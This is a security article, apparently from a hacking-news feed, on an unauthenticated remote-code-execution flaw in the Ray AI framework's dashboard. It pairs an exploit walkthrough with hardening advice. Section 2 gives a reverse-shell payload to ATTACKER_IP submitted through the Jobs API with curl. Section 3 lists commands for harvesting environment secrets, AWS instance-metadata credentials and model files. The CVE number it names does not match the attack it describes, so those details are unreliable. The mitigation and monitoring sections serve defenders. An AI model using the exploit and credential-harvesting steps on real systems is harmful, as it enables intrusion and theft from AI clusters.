Over 100,000 AI Clusters at Risk: Critical Ray Vulnerability Exposes Training Data and Compute

Introduction:

A recently uncovered vulnerability in the Ray AI framework, tracked as CVE-2023-6019, has placed over 100,000 AI clusters worldwide at risk of complete compromise. Ray, an open-source unified compute framework, is widely used by major tech companies and research institutions to scale AI and Python workloads. The flaw allows attackers to execute arbitrary code, exfiltrate sensitive training data, and hijack computational resources, posing a significant supply chain risk to the AI development ecosystem.

Learning Objectives:

  • Understand the architecture of the Ray framework and the attack surface exposed by CVE-2023-6019.
  • Learn how to identify vulnerable Ray instances using network scanning tools.
  • Master the step-by-step process of exploiting the vulnerability for authorized penetration testing.
  • Implement robust mitigation strategies and cloud-hardening techniques to secure AI clusters.
  • Apply Linux and Kubernetes security best practices to prevent similar remote code execution flaws.

You Should Know:

1. Anatomy of the Ray Vulnerability and Initial Reconnaissance

The Ray framework operates with a head node and multiple worker nodes. The vulnerability resides in the Ray Dashboard component, which by default listens on port 8265 without proper authentication. Attackers can exploit this to submit arbitrary jobs, effectively gaining remote code execution.

To identify exposed Ray clusters in your environment, use the following Nmap command:

nmap -p 8265,6379,10001 --open -sV -sC -oG ray_scan.txt <target_network/CIDR>

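This scans for common Ray ports (Dashboard: 8265, GCS server: 6379, Ray Client server: 10001), performs version detection (`-sV`), runs Nmap's default scripts (`-sC`), and writes greppable output to ray_scan.txt. Port 6379 was the Redis port in older Ray releases; current releases use it for the GCS server by default.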

Once a live Ray instance is identified, you can access the dashboard via a browser:

http://<target_ip>:8265

If the instance is vulnerable, you will see the Ray UI without any login prompt.
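For larger networks, the greppable file written by the scan above can be summarized with a short script. The following is a minimal sketch, assuming the usual `-oG` line layout (`Host: <ip> (...)` followed by `Ports: <port>/open/tcp//...`); the function name `open_ray_ports` is ours and not part of Nmap or Ray.

```python
import re

# Ports taken from the Nmap command above.
RAY_PORTS = {8265, 6379, 10001}

HOST_RE = re.compile(r"^Host:\s+(\S+)")
PORT_RE = re.compile(r"(\d+)/open/tcp")


def open_ray_ports(grepable_text):
    """Map each host in `nmap -oG` output to the Ray-related ports reported open."""
    findings = {}
    for line in grepable_text.splitlines():
        host = HOST_RE.match(line)
        # Only "Ports:" lines carry per-port results; "Status:" lines are skipped.
        if not host or "Ports:" not in line:
            continue
        ports = [int(p) for p in PORT_RE.findall(line.split("Ports:", 1)[1])]
        hits = sorted(p for p in ports if p in RAY_PORTS)
        if hits:
            findings[host.group(1)] = hits
    return findings
```

Calling `open_ray_ports(open("ray_scan.txt").read())` returns a dictionary of hosts and their open Ray ports, which can then be checked against your asset inventory.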

2. Exploiting the Flaw: Gaining Remote Code Execution

To demonstrate the exploit for security testing, you can interact with the Ray Jobs API directly using curl. The following command submits a new job that executes a reverse shell on the head node.

First, craft a Python script to be submitted (save as exploit.py):

import os
os.system('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')

Then, use the Ray Jobs API to submit the job:

curl -X POST http://<target_ip>:8265/api/jobs/ \
-H "Content-Type: application/json" \
-d '{
"entrypoint": "python exploit.py",
"runtime_env": {
"working_dir": "."
}
}'

On your attacker machine, set up a netcat listener:

nc -lvnp 4444

A successful execution will grant you a shell on the Ray head node, providing access to environment variables, model weights, and potentially cloud metadata credentials.

3. Post-Exploitation: Extracting Secrets and Model Data

Once inside the cluster, attackers typically target environment variables containing API keys and cloud service accounts. Use the following commands to enumerate sensitive information:

# Dump environment variables
env | grep -E "KEY|SECRET|TOKEN|PASS"

# Access cloud metadata (AWS IMDS)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Search for common AI/ML artifacts
find / -name "*.pth" -o -name "*.h5" -o -name "*.joblib" 2>/dev/null

Ray worker nodes often mount shared storage. Check for mounted volumes using `df -h` and `lsblk`. This is where training datasets and model checkpoints are frequently stored.

4. Mitigation: Securing Ray on Linux Servers

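Immediate patching involves upgrading Ray to a release that contains the fix (2.8.1 or later according to the advisory for CVE-2023-6019; 2.6.3 is listed among the affected versions). On Ubuntu/Debian-based systems: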

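# Quote the package spec so the shell does not interpret the brackets
pip install -U "ray[default]"
# Restart Ray (assumes it runs as a systemd unit named "ray")
sudo systemctl restart ray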
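After upgrading, it is worth confirming which version each node actually runs. The sketch below reads the installed version through the standard library and compares it with a minimum that you supply from the vendor advisory; the helper names are ours, and the comparison deliberately ignores pre-release suffixes such as `rc1`.

```python
from importlib import metadata


def parse_version(text):
    """Turn '2.9.0rc1' into (2, 9, 0) by keeping the leading digits of each part."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_at_least(installed, minimum):
    """Return True if `installed` is the same as or newer than `minimum`."""
    return parse_version(installed) >= parse_version(minimum)


def installed_ray_version():
    """Return the installed Ray version string, or None if Ray is not installed."""
    try:
        return metadata.version("ray")
    except metadata.PackageNotFoundError:
        return None
```

On a node, `installed_ray_version()` gives the version string, and `is_at_least(version, minimum)` tells you whether it meets the fixed release named in the advisory.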

If upgrading immediately is not possible, implement strict network filtering using iptables:

# Allow only internal subnet access to Ray ports
sudo iptables -A INPUT -p tcp --dport 8265 -s 10.0.0.0/8 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8265 -j DROP

Additionally, bind the Ray dashboard to localhost only in the configuration:

ray start --head --dashboard-host 127.0.0.1
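To confirm that the firewall rule or the localhost binding took effect, test reachability from a machine outside the allowed range. This is a minimal sketch using only the standard library; `is_reachable` is a hypothetical helper name, and a refused or timed-out connection is treated as "not reachable".

```python
import socket


def is_reachable(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable networks.
        return False
```

Run from the head node itself, `is_reachable("127.0.0.1", 8265)` should still return True while the dashboard is running; run from an external host against the head node's routable address, the expected result after hardening is False.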

5. Hardening Ray Deployments on Kubernetes

In Kubernetes environments, Ray is often deployed via the Ray Operator. To secure the cluster, define a NetworkPolicy that restricts ingress traffic to the Ray head service.

Save the following as `ray-network-policy.yaml`:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ray-dashboard-allow-internal
spec:
  podSelector:
    matchLabels:
      ray.io/node-type: head
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: authorized-client
      ports:
        - protocol: TCP
          port: 8265

Apply the policy:

kubectl apply -f ray-network-policy.yaml
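Because YAML indentation is easy to get wrong, the same policy can also be generated as JSON, which `kubectl apply -f` accepts as well. The sketch below mirrors the manifest above field for field; the function name and its parameters are ours.

```python
import json


def ray_dashboard_policy(client_label="authorized-client", port=8265):
    """Build the NetworkPolicy from the manifest above as a plain dictionary."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "ray-dashboard-allow-internal"},
        "spec": {
            # Selects the Ray head pod.
            "podSelector": {"matchLabels": {"ray.io/node-type": "head"}},
            "policyTypes": ["Ingress"],
            "ingress": [
                {
                    # Only pods carrying this label may connect.
                    "from": [{"podSelector": {"matchLabels": {"app": client_label}}}],
                    "ports": [{"protocol": "TCP", "port": port}],
                }
            ],
        },
    }


print(json.dumps(ray_dashboard_policy(), indent=2))
```

Redirect the output to a file such as `ray-network-policy.json` and apply it in the same way. Note that once a pod is selected by an Ingress policy, all traffic not explicitly allowed is dropped, so a real deployment will probably need a further rule that lets worker pods reach the head node.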

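Also, enable TLS for Ray's gRPC traffic by setting `RAY_USE_TLS=1` together with `RAY_TLS_SERVER_CERT`, `RAY_TLS_SERVER_KEY`, and `RAY_TLS_CA_CERT`. TLS protects traffic between Ray nodes; it does not add a login to the dashboard, so access to port 8265 still has to be restricted at the network level or placed behind an authenticating proxy.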

6. API Security and Monitoring

To proactively detect exploitation attempts, monitor Ray API logs for anomalous job submissions. Ray logs are typically stored in /tmp/ray/session_latest/logs/. Use `tail` and `grep` to watch for suspicious entries:

tail -f /tmp/ray/session_latest/logs/dashboard.log | grep -E "POST /api/jobs|job_submit"
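The same filter can be scripted when the results need to be counted or forwarded. This is a rough sketch that reuses the grep pattern above; it assumes, without confirmation from the Ray documentation, that a matching log line may contain the client's IPv4 address, and simply skips the count when it does not.

```python
import re
from collections import Counter

# Same pattern as the grep command above.
JOB_PATTERN = re.compile(r"POST /api/jobs|job_submit")
# Loose IPv4 matcher; the presence of an address in the log line is an assumption.
IPV4_PATTERN = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def suspicious_lines(lines):
    """Yield log lines that mention a job submission."""
    for line in lines:
        if JOB_PATTERN.search(line):
            yield line.rstrip("\n")


def count_by_ip(lines):
    """Count job-submission lines per IPv4 address found in the line, if any."""
    counts = Counter()
    for line in suspicious_lines(lines):
        match = IPV4_PATTERN.search(line)
        if match:
            counts[match.group(0)] += 1
    return dict(counts)
```

Both functions accept any iterable of lines, so an open file handle on `dashboard.log` can be passed directly, and the per-address counts can be sent to the SIEM as a simple alerting signal.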

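Integrate these logs with a SIEM solution. The following auditd rule records `bind` system calls made by logged-in users, which shows when a process starts listening on a port such as 8265 (it does not record inbound connections). The filter expressions are quoted so the shell does not treat `>` as a redirection:

auditctl -a always,exit -F arch=b64 -S bind -F 'auid>=1000' -F 'auid!=4294967295' -k ray-access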

What Undercode Say:

  • Key Takeaway 1: The Ray vulnerability underscores a critical blind spot in AI/ML infrastructure security. Default configurations in popular compute frameworks cannot be trusted and must be hardened before deployment to production, especially when handling sensitive data.
  • Key Takeaway 2: Supply chain attacks on AI frameworks are escalating. The ability to execute arbitrary code on Ray clusters not only exposes proprietary models but also provides a pivot point into the broader cloud environment, making it a high-value target for APT groups and cybercriminals.

This incident highlights that the rapid adoption of AI technologies has outpaced the implementation of basic security hygiene. Organizations must integrate security reviews into their MLOps pipelines, treat AI clusters as critical infrastructure, and enforce the principle of least privilege at the network and application levels. The complexity of distributed systems like Ray requires specialized knowledge to secure, and reliance on open-source components necessitates continuous vulnerability monitoring and rapid patch management.

Prediction:

Following this disclosure, we will see a surge in targeted attacks against AI development environments, particularly those hosted in misconfigured cloud instances. This will accelerate the development of AI Security Posture Management (AI-SPM) tools and drive the adoption of “AI Red Teaming” as a standard practice. Future exploits will likely chain this vulnerability with others in the Python supply chain (e.g., malicious PyPI packages) to achieve fully automated, large-scale compromise of AI training pipelines, leading to the first major AI data breach involving stolen foundational models.

Reported By: Drmarthaboeckenfeld Surgical – Hackers Feeds